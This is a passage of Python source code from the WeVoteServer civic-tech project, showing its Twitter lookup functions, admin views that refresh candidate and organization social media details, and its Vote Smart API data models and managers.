'twitter_handle_found': twitter_handle_found,
'voter_info_retrieved': voter_info_retrieved,
'switch_accounts': switch_accounts,
'return_url': return_url,
}
return results
```
#### File: WeVoteServer/import_export_twitter/functions.py
```python
from config.base import get_environment_variable
import tweepy
import wevote_functions.admin
logger = wevote_functions.admin.get_logger(__name__)
WE_VOTE_SERVER_ROOT_URL = get_environment_variable("WE_VOTE_SERVER_ROOT_URL")
TWITTER_CONSUMER_KEY = get_environment_variable("TWITTER_CONSUMER_KEY")
TWITTER_CONSUMER_SECRET = get_environment_variable("TWITTER_CONSUMER_SECRET")
TWITTER_ACCESS_TOKEN = get_environment_variable("TWITTER_ACCESS_TOKEN")
TWITTER_ACCESS_TOKEN_SECRET = get_environment_variable("TWITTER_ACCESS_TOKEN_SECRET")
def retrieve_twitter_user_info(twitter_handle):
auth = tweepy.OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
twitter_handle_found = False
twitter_json = []
try:
twitter_user = api.get_user(twitter_handle)
twitter_json = twitter_user._json
success = True
status = 'TWITTER_RETRIEVE_SUCCESSFUL'
twitter_handle_found = True
except tweepy.RateLimitError:
success = False
status = 'TWITTER_RATE_LIMIT_ERROR'
except tweepy.error.TweepError as error_instance:
success = False
status = ''
error_tuple = error_instance.args
for error_dict in error_tuple:
for one_error in error_dict:
status += '[' + one_error['message'] + '] '
results = {
'status': status,
'success': success,
'twitter_handle': twitter_handle,
'twitter_handle_found': twitter_handle_found,
'twitter_json': twitter_json,
}
return results
```
#### File: WeVoteServer/import_export_twitter/views_admin.py
```python
from .controllers import refresh_twitter_candidate_details, retrieve_twitter_data_for_all_organizations, \
refresh_twitter_organization_details, \
scrape_social_media_from_one_site, refresh_twitter_candidate_details_for_election, \
scrape_and_save_social_media_for_candidates_in_one_election, scrape_and_save_social_media_from_all_organizations, \
transfer_candidate_twitter_handles_from_google_civic
from .functions import retrieve_twitter_user_info
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaignManager
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from organization.controllers import update_social_media_statistics_in_other_tables
from organization.models import OrganizationManager
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
@login_required
def refresh_twitter_candidate_details_view(request, candidate_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
candidate_manager = CandidateCampaignManager()
results = candidate_manager.retrieve_candidate_campaign(candidate_id)
if not results['candidate_campaign_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
candidate_campaign = results['candidate_campaign']
results = refresh_twitter_candidate_details(candidate_campaign)
return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
@login_required
def refresh_twitter_organization_details_view(request, organization_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id)
if not results['organization_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('organization:organization_edit', args=(organization_id,)) +
'?google_civic_election_id=' + str(google_civic_election_id))
organization = results['organization']
results = refresh_twitter_organization_details(organization)
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)) +
'?google_civic_election_id=' + str(google_civic_election_id))
@login_required
def refresh_twitter_politician_details_view(request, politician_id): # TODO DALE Get this working for politicians
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# candidate_manager = CandidateCampaignManager()
# results = candidate_manager.retrieve_candidate_campaign(candidate_id)
#
# if not results['candidate_campaign_found']:
# messages.add_message(request, messages.INFO, results['status'])
# return HttpResponseRedirect(reverse('candidate:candidate_edit', args=(candidate_id,)))
#
# candidate_campaign = results['candidate_campaign']
#
# results = refresh_twitter_candidate_details(candidate_campaign)
return HttpResponseRedirect(reverse('politician:politician_edit', args=(politician_id,)))
@login_required
def scrape_website_for_social_media_view(request, organization_id, force_retrieve=False):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
facebook_page = False
twitter_handle = False
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id)
if not results['organization_found']:
messages.add_message(request, messages.INFO, results['status'])
return HttpResponseRedirect(reverse('organization:organization_edit', args=(organization_id,)))
organization = results['organization']
if not organization.organization_website:
messages.add_message(request, messages.ERROR, "No organizational website found.")
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)))
if (not positive_value_exists(organization.organization_twitter_handle)) or \
(not positive_value_exists(organization.organization_facebook)) or force_retrieve:
scrape_results = scrape_social_media_from_one_site(organization.organization_website)
if scrape_results['twitter_handle_found']:
twitter_handle = scrape_results['twitter_handle']
messages.add_message(request, messages.INFO, "Twitter handle found: " + twitter_handle)
else:
messages.add_message(request, messages.INFO, "No Twitter handle found: " + scrape_results['status'])
if scrape_results['facebook_page_found']:
facebook_page = scrape_results['facebook_page']
messages.add_message(request, messages.INFO, "Facebook page found: " + facebook_page)
save_results = organization_manager.update_organization_social_media(organization, twitter_handle,
facebook_page)
if save_results['success']:
organization = save_results['organization']
else:
organization.organization_twitter_handle = twitter_handle # Store it temporarily
# ######################################
if organization.organization_twitter_handle:
results = retrieve_twitter_user_info(organization.organization_twitter_handle)
if results['success']:
save_results = organization_manager.update_organization_twitter_details(
organization, results['twitter_json'])
if save_results['success']:
organization = save_results['organization']
results = update_social_media_statistics_in_other_tables(organization)
# ######################################
return HttpResponseRedirect(reverse('organization:organization_position_list', args=(organization_id,)))
@login_required
def retrieve_twitter_data_for_all_organizations_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
first_retrieve_only = request.GET.get('first_retrieve_only', True)
results = retrieve_twitter_data_for_all_organizations(state_code=organization_state_code,
google_civic_election_id=google_civic_election_id,
first_retrieve_only=first_retrieve_only)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
number_of_twitter_accounts_queried = results['number_of_twitter_accounts_queried']
number_of_organizations_updated = results['number_of_organizations_updated']
messages.add_message(request, messages.INFO,
"Twitter accounts queried: {number_of_twitter_accounts_queried}, "
"Organizations updated: {number_of_organizations_updated}".format(
number_of_twitter_accounts_queried=number_of_twitter_accounts_queried,
number_of_organizations_updated=number_of_organizations_updated))
return HttpResponseRedirect(reverse('organization:organization_list', args=()) +
'?organization_state=' + organization_state_code)
@login_required
def scrape_social_media_from_all_organizations_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
organization_state_code = request.GET.get('organization_state', '')
force_retrieve = request.GET.get('force_retrieve', False) # Retrieve data again even if we already have data
results = scrape_and_save_social_media_from_all_organizations(state_code=organization_state_code,
force_retrieve=force_retrieve)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_found = results['twitter_handles_found']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles found: {twitter_handles_found}".format(
twitter_handles_found=twitter_handles_found))
return HttpResponseRedirect(reverse('organization:organization_list', args=()) +
'?organization_state=' + organization_state_code)
@login_required
def scrape_social_media_for_candidates_in_one_election_view(request):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
results = scrape_and_save_social_media_for_candidates_in_one_election(
google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_found = results['twitter_handles_found']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles found: {twitter_handles_found}".format(
twitter_handles_found=twitter_handles_found))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + str(google_civic_election_id))
@login_required
def refresh_twitter_candidate_details_for_election_view(request, election_id):
authority_required = {'admin'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = convert_to_int(election_id)
results = refresh_twitter_candidate_details_for_election(google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_added = results['twitter_handles_added']
profiles_refreshed_with_twitter_data = results['profiles_refreshed_with_twitter_data']
messages.add_message(request, messages.INFO,
"Social media retrieved. Twitter handles added: {twitter_handles_added}, "
"Profiles refreshed with Twitter data: {profiles_refreshed_with_twitter_data}".format(
twitter_handles_added=twitter_handles_added,
profiles_refreshed_with_twitter_data=profiles_refreshed_with_twitter_data))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + election_id)
@login_required
def transfer_candidate_twitter_handles_from_google_civic_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
results = transfer_candidate_twitter_handles_from_google_civic(
google_civic_election_id=google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.INFO, results['status'])
else:
twitter_handles_transferred = results['twitter_handles_transferred']
messages.add_message(request, messages.INFO,
"Twitter handles transferred: {twitter_handles_transferred}".format(
twitter_handles_transferred=twitter_handles_transferred))
return HttpResponseRedirect(reverse('candidate:candidate_list', args=()) +
'?google_civic_election_id=' + str(google_civic_election_id))
```
#### File: WeVoteServer/import_export_vote_smart/models.py
```python
from datetime import date, timedelta
from django.db import models
from django.db.models import Q
from organization.models import OrganizationManager, Organization
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
class VoteSmartApiCounter(models.Model):
# The data and time we reached out to the Google Civic API
datetime_of_action = models.DateTimeField(verbose_name='date and time of action', null=False, auto_now=True)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterDailySummary(models.Model):
# The date (without time) we are summarizing
date_of_action = models.DateField(verbose_name='date of action', null=False, auto_now=False)
# For each day we will have an "all" entry, as well as one entry with the total number (per day)
# of each kind of call to Google
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterWeeklySummary(models.Model):
# The year as a 4 digit integer
year_of_action = models.SmallIntegerField(verbose_name='year of action', null=False)
# The week in this year as a number between 1-52
# For each week we will have an "all" entry, as well as one entry with the total number (per day)
# of each kind of call to Google
week_of_action = models.SmallIntegerField(verbose_name='number of the week', null=False)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# This table contains summary entries generated from individual entries stored in the VoteSmartApiCounter table
class VoteSmartApiCounterMonthlySummary(models.Model):
# The year as a 4 digit integer
year_of_action = models.SmallIntegerField(verbose_name='year of action', null=False)
# The week in this year as a number between 1-52
# For each month we will have an "all" entry, as well as one entry with the total number (per day)
# of each kind of call to Google
month_of_action = models.SmallIntegerField(verbose_name='number of the month', null=False)
kind_of_action = models.CharField(verbose_name="kind of call to vote smart", max_length=50, null=True, blank=True)
# Store the election this is for
google_civic_election_id = models.PositiveIntegerField(verbose_name="google civic election id", null=True)
# noinspection PyBroadException
class VoteSmartApiCounterManager(models.Model):
def create_counter_entry(self, kind_of_action, google_civic_election_id=0):
"""
Create an entry that records that a call to the Vote Smart Api was made.
"""
try:
google_civic_election_id = convert_to_int(google_civic_election_id)
# TODO: We need to work out the timezone questions
VoteSmartApiCounter.objects.create(
kind_of_action=kind_of_action,
google_civic_election_id=google_civic_election_id,
)
success = True
status = 'ENTRY_SAVED'
except Exception:
success = False
status = 'SOME_ERROR'
results = {
'success': success,
'status': status,
}
return results
def retrieve_daily_summaries(self, kind_of_action='', google_civic_election_id=0):
# Start with today and cycle backwards in time
daily_summaries = []
day_on_stage = date.today() # TODO: We need to work out the timezone questions
number_found = 0
maximum_attempts = 30
attempt_count = 0
try:
# Limit the number of times this runs to EITHER 1) 5 positive numbers
# OR 2) 30 days in the past, whichever comes first
while number_found <= 5 and attempt_count <= maximum_attempts:
attempt_count += 1
counter_queryset = VoteSmartApiCounter.objects.all()
if positive_value_exists(kind_of_action):
counter_queryset = counter_queryset.filter(kind_of_action=kind_of_action)
if positive_value_exists(google_civic_election_id):
counter_queryset = counter_queryset.filter(google_civic_election_id=google_civic_election_id)
# Find the number of these entries on that particular day
counter_queryset = counter_queryset.filter(datetime_of_action__contains=day_on_stage)
api_call_count = len(counter_queryset)
# If any api calls were found on that date, pass it out for display
if positive_value_exists(api_call_count):
daily_summary = {
'date_string': day_on_stage,
'count': api_call_count,
}
daily_summaries.append(daily_summary)
number_found += 1
day_on_stage -= timedelta(days=1)
except Exception:
pass
return daily_summaries
class VoteSmartCandidateManager(models.Model):
def __unicode__(self):
return "VoteSmartCandidateManager"
def retrieve_candidate_from_vote_smart_id(self, vote_smart_candidate_id):
return self.retrieve_vote_smart_candidate(vote_smart_candidate_id)
def retrieve_vote_smart_candidate_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
return vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
def fetch_vote_smart_candidate_id_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(vote_smart_candidate_id, we_vote_id)
if results['success']:
return results['vote_smart_candidate_id']
return 0
#
# def retrieve_vote_smart_candidate_from_we_vote_local_id(self, local_candidate_id):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
# return vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, we_vote_id, candidate_maplight_id)
#
# def retrieve_vote_smart_candidate_from_full_name(self, candidate_name, state_code=None):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# candidate_maplight_id = ''
# vote_smart_candidate_manager = VoteSmartCandidateManager()
#
# results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
def retrieve_vote_smart_candidate_from_name_components(self, first_name=None, last_name=None, state_code=None):
vote_smart_candidate_id = 0
vote_smart_candidate_manager = VoteSmartCandidateManager()
results = vote_smart_candidate_manager.retrieve_vote_smart_candidate(
vote_smart_candidate_id, first_name, last_name, state_code)
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_vote_smart_candidate(
self, vote_smart_candidate_id=None, first_name=None, last_name=None, state_code=None):
"""
We want to return one and only one candidate
:param vote_smart_candidate_id:
:param first_name:
:param last_name:
:param state_code:
:return:
"""
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_candidate = VoteSmartCandidate()
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_candidate = VoteSmartCandidate.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_ID"
elif positive_value_exists(first_name) or positive_value_exists(last_name):
candidate_queryset = VoteSmartCandidate.objects.all()
if positive_value_exists(first_name):
first_name = first_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
candidate_queryset = candidate_queryset.filter(Q(firstName__istartswith=first_name) |
Q(nickName__istartswith=first_name) |
Q(preferredName__istartswith=first_name))
if positive_value_exists(last_name):
last_name = last_name.replace("`", "'") # Vote Smart doesn't like this kind of apostrophe: `
candidate_queryset = candidate_queryset.filter(lastName__iexact=last_name)
if positive_value_exists(state_code):
candidate_queryset = candidate_queryset.filter(Q(electionStateId__iexact=state_code) |
Q(electionStateId__iexact="NA"))
vote_smart_candidate_list = list(candidate_queryset[:1])
if vote_smart_candidate_list:
vote_smart_candidate = vote_smart_candidate_list[0]
else:
vote_smart_candidate = VoteSmartCandidate()
vote_smart_candidate_id = convert_to_int(vote_smart_candidate.candidateId)
status = "RETRIEVE_VOTE_SMART_CANDIDATE_FOUND_BY_NAME"
else:
status = "RETRIEVE_VOTE_SMART_CANDIDATE_SEARCH_INDEX_MISSING"
except VoteSmartCandidate.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_MULTIPLE_OBJECTS_RETURNED"
except VoteSmartCandidate.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_NOT_FOUND"
results = {
'success': True if positive_value_exists(vote_smart_candidate_id) else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_candidate_found': True if positive_value_exists(vote_smart_candidate_id) else False,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_candidate': vote_smart_candidate,
}
return results
def retrieve_vote_smart_candidate_bio(self, vote_smart_candidate_id):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_candidate_bio = VoteSmartCandidateBio()
vote_smart_candidate_bio_found = False
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_candidate_bio = VoteSmartCandidateBio.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_candidate_bio.candidateId)
vote_smart_candidate_bio_found = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_FOUND_BY_ID"
success = True
else:
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_ID_MISSING"
success = False
except VoteSmartCandidateBio.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_MULTIPLE_OBJECTS_RETURNED"
success = False
except VoteSmartCandidateBio.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_CANDIDATE_BIO_NOT_FOUND"
success = False
results = {
'success': success,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_candidate_bio_found': vote_smart_candidate_bio_found,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_candidate_bio': vote_smart_candidate_bio,
}
return results
class VoteSmartCandidate(models.Model):
"""http://api.votesmart.org/docs/Candidates.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
preferredName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
title = models.CharField(max_length=255)
ballotName = models.CharField(max_length=255)
electionParties = models.CharField(max_length=255)
electionStatus = models.CharField(max_length=255)
electionStage = models.CharField(max_length=255)
electionDistrictId = models.CharField(max_length=255)
electionDistrictName = models.CharField(max_length=255)
electionOffice = models.CharField(max_length=255)
electionOfficeId = models.CharField(max_length=255)
electionStateId = models.CharField(max_length=255)
electionOfficeTypeId = models.CharField(max_length=255)
electionYear = models.CharField(max_length=255)
electionSpecial = models.CharField(max_length=255)
electionDate = models.CharField(max_length=255)
officeParties = models.CharField(max_length=255)
officeStatus = models.CharField(max_length=255)
officeDistrictId = models.CharField(max_length=255)
officeDistrictName = models.CharField(max_length=255)
officeStateId = models.CharField(max_length=255)
officeId = models.CharField(max_length=255)
officeName = models.CharField(max_length=255)
officeTypeId = models.CharField(max_length=255)
runningMateId = models.CharField(max_length=255)
runningMateName = models.CharField(max_length=255)
def vote_smart_candidate_object_filter(one_candidate):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_candidate:
:return:
"""
one_candidate_filtered = {
'candidateId': one_candidate.candidateId,
'firstName': one_candidate.firstName,
'nickName': one_candidate.nickName,
'middleName': one_candidate.middleName,
'preferredName': one_candidate.preferredName,
'lastName': one_candidate.lastName,
'suffix': one_candidate.suffix,
'title': one_candidate.title,
'ballotName': one_candidate.ballotName,
'electionParties': one_candidate.electionParties,
'electionStatus': one_candidate.electionStatus,
'electionStage': one_candidate.electionStage,
'electionDistrictId': one_candidate.electionDistrictId,
'electionDistrictName': one_candidate.electionDistrictName,
'electionOffice': one_candidate.electionOffice,
'electionOfficeId': one_candidate.electionOfficeId,
'electionStateId': one_candidate.electionStateId,
'electionOfficeTypeId': one_candidate.electionOfficeTypeId,
'electionYear': one_candidate.electionYear,
'electionSpecial': one_candidate.electionSpecial,
'electionDate': one_candidate.electionDate,
'officeParties': one_candidate.officeParties,
'officeStatus': one_candidate.officeStatus,
'officeDistrictId': one_candidate.officeDistrictId,
'officeDistrictName': one_candidate.officeDistrictName,
'officeStateId': one_candidate.officeStateId,
'officeId': one_candidate.officeId,
'officeName': one_candidate.officeName,
'officeTypeId': one_candidate.officeTypeId,
'runningMateId': one_candidate.runningMateId,
'runningMateName': one_candidate.runningMateName,
}
return one_candidate_filtered
class VoteSmartCandidateBio(models.Model):
"""
http://api.votesmart.org/docs/CandidateBio.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
crpId = models.CharField(max_length=15) # OpenSecrets ID
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
preferredName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
birthDate = models.CharField(max_length=255)
birthPlace = models.CharField(max_length=255)
pronunciation = models.CharField(max_length=255)
gender = models.CharField(max_length=255)
family = models.CharField(max_length=255)
photo = models.CharField(max_length=255)
homeCity = models.CharField(max_length=255)
homeState = models.CharField(max_length=255)
religion = models.CharField(max_length=255)
# specialMsg = models.CharField(max_length=255)
# parties = models.CharField(max_length=255)
# title = models.CharField(max_length=255)
# shortTitle = models.CharField(max_length=255)
# name = models.CharField(max_length=255)
# type = models.CharField(max_length=255)
# status = models.CharField(max_length=255)
# firstElect = models.CharField(max_length=255)
# lastElect = models.CharField(max_length=255)
# nextElect = models.CharField(max_length=255)
# termStart = models.CharField(max_length=255)
# termEnd = models.CharField(max_length=255)
# district = models.CharField(max_length=255)
# districtId = models.CharField(max_length=255)
# stateId = models.CharField(max_length=255)
education = models.CharField(max_length=255)
# profession
def vote_smart_candidate_bio_object_filter(one_candidate_bio):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_candidate_bio:
:return:
"""
one_candidate_bio_filtered = {
'candidateId': one_candidate_bio.candidateId,
'crpId': one_candidate_bio.crpId, # Open Secrets ID
'firstName': one_candidate_bio.firstName,
'nickName': one_candidate_bio.nickName,
'middleName': one_candidate_bio.middleName,
'lastName': one_candidate_bio.lastName,
'suffix': one_candidate_bio.suffix,
'birthDate': one_candidate_bio.birthDate,
'birthPlace': one_candidate_bio.birthPlace,
'pronunciation': one_candidate_bio.pronunciation,
'gender': one_candidate_bio.gender,
'family': one_candidate_bio.family,
'photo': one_candidate_bio.photo,
'homeCity': one_candidate_bio.homeCity,
'homeState': one_candidate_bio.homeState,
'religion': one_candidate_bio.religion,
# 'specialMsg': one_candidate_bio.specialMsg,
# 'parties': one_candidate_bio.parties,
# 'title': one_candidate_bio.title,
# 'shortTitle': one_candidate_bio.shortTitle,
# 'name': one_candidate_bio.name,
# 'type': one_candidate_bio.type,
# 'status': one_candidate_bio.status,
# 'firstElect': one_candidate_bio.firstElect,
# 'lastElect': one_candidate_bio.lastElect,
# 'nextElect': one_candidate_bio.nextElect,
# 'termStart': one_candidate_bio.termStart,
# 'termEnd': one_candidate_bio.termEnd,
# 'district': one_candidate_bio.district,
# 'districtId': one_candidate_bio.districtId,
# 'stateId': one_candidate_bio.stateId,
}
return one_candidate_bio_filtered
class VoteSmartOfficialManager(models.Model):
def __unicode__(self):
return "VoteSmartOfficialManager"
def retrieve_official_from_vote_smart_id(self, vote_smart_candidate_id):
return self.retrieve_vote_smart_official(vote_smart_candidate_id)
def retrieve_vote_smart_official_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
return vote_smart_official_manager.retrieve_vote_smart_official(vote_smart_candidate_id, we_vote_id)
def fetch_vote_smart_candidate_id_from_we_vote_id(self, we_vote_id):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
results = vote_smart_official_manager.retrieve_vote_smart_official(vote_smart_candidate_id, we_vote_id)
if results['success']:
return results['vote_smart_candidate_id']
return 0
#
# def retrieve_vote_smart_official_from_we_vote_local_id(self, local_official_id):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# vote_smart_official_manager = VoteSmartOfficialManager()
# return vote_smart_official_manager.retrieve_vote_smart_official(
# vote_smart_candidate_id, we_vote_id, official_maplight_id)
#
# def retrieve_vote_smart_official_from_full_name(self, official_name, state_code=None):
# vote_smart_candidate_id = 0
# we_vote_id = ''
# official_maplight_id = ''
# vote_smart_official_manager = VoteSmartOfficialManager()
#
# results = vote_smart_official_manager.retrieve_vote_smart_official(
# vote_smart_candidate_id, first_name, last_name, state_code)
# return results
def retrieve_vote_smart_official_from_name_components(self, first_name=None, last_name=None, state_code=None):
vote_smart_candidate_id = 0
vote_smart_official_manager = VoteSmartOfficialManager()
results = vote_smart_official_manager.retrieve_vote_smart_official(
vote_smart_candidate_id, first_name, last_name, state_code)
return results
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_vote_smart_official(
self, vote_smart_candidate_id=None, first_name=None, last_name=None, state_code=None):
"""
We want to return one and only one official
:param vote_smart_candidate_id:
:param first_name:
:param last_name:
:param state_code:
:return:
"""
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
vote_smart_official = VoteSmartOfficial()
try:
if positive_value_exists(vote_smart_candidate_id):
vote_smart_official = VoteSmartOfficial.objects.get(candidateId=vote_smart_candidate_id)
vote_smart_candidate_id = convert_to_int(vote_smart_official.candidateId)
status = "RETRIEVE_VOTE_SMART_OFFICIAL_FOUND_BY_ID"
elif positive_value_exists(first_name) or positive_value_exists(last_name):
official_queryset = VoteSmartOfficial.objects.all()
if positive_value_exists(first_name):
official_queryset = official_queryset.filter(firstName__istartswith=first_name)
if positive_value_exists(last_name):
official_queryset = official_queryset.filter(lastName__iexact=last_name)
if positive_value_exists(state_code):
official_queryset = official_queryset.filter(officeStateId__iexact=state_code)
vote_smart_official_list = list(official_queryset[:1])
if vote_smart_official_list:
vote_smart_official = vote_smart_official_list[0]
else:
vote_smart_official = VoteSmartOfficial()
vote_smart_candidate_id = convert_to_int(vote_smart_official.candidateId)
status = "RETRIEVE_VOTE_SMART_OFFICIAL_FOUND_BY_NAME"
else:
status = "RETRIEVE_VOTE_SMART_OFFICIAL_SEARCH_INDEX_MISSING"
except VoteSmartOfficial.MultipleObjectsReturned as e:
exception_multiple_object_returned = True
status = "RETRIEVE_VOTE_SMART_OFFICIAL_MULTIPLE_OBJECTS_RETURNED"
except VoteSmartOfficial.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_VOTE_SMART_OFFICIAL_NOT_FOUND"
results = {
'success': True if positive_value_exists(vote_smart_candidate_id) else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'vote_smart_official_found': True if positive_value_exists(vote_smart_candidate_id) else False,
'vote_smart_candidate_id': vote_smart_candidate_id,
'vote_smart_official': vote_smart_official,
}
return results
class VoteSmartOfficial(models.Model):
"""
http://api.votesmart.org/docs/Officials.html
"""
candidateId = models.CharField(max_length=15, primary_key=True)
firstName = models.CharField(max_length=255)
nickName = models.CharField(max_length=255)
middleName = models.CharField(max_length=255)
lastName = models.CharField(max_length=255)
suffix = models.CharField(max_length=255)
title = models.CharField(max_length=255)
electionParties = models.CharField(max_length=255)
officeParties = models.CharField(max_length=255)
officeStatus = models.CharField(max_length=255)
officeDistrictId = models.CharField(max_length=255)
officeDistrictName = models.CharField(max_length=255)
officeTypeId = models.CharField(max_length=255)
officeId = models.CharField(max_length=255)
officeName = models.CharField(max_length=255)
officeStateId = models.CharField(max_length=255)
def vote_smart_official_object_filter(one_official):
"""
Filter down the complete dict from Vote Smart to just the fields we use locally
:param one_official:
:return:
"""
one_official_filtered = {
'candidateId': one_official.candidateId,
'firstName': one_official.firstName,
'nickName': one_official.nickName,
'middleName': one_official.middleName,
'lastName': one_official.lastName,
'suffix': one_official.suffix,
'title': one_official.title,
'electionParties': one_official.electionParties,
'officeParties': one_official.officeParties,
'officeStatus': one_official.officeStatus,
'officeDistrictId': one_official.officeDistrictId,
'officeDistrictName': one_official.officeDistrictName,
'officeTypeId': one_official.officeTypeId,
'officeId': one_official.officeId,
'officeName': one_official.officeName,
'officeStateId': one_official.officeStateId,
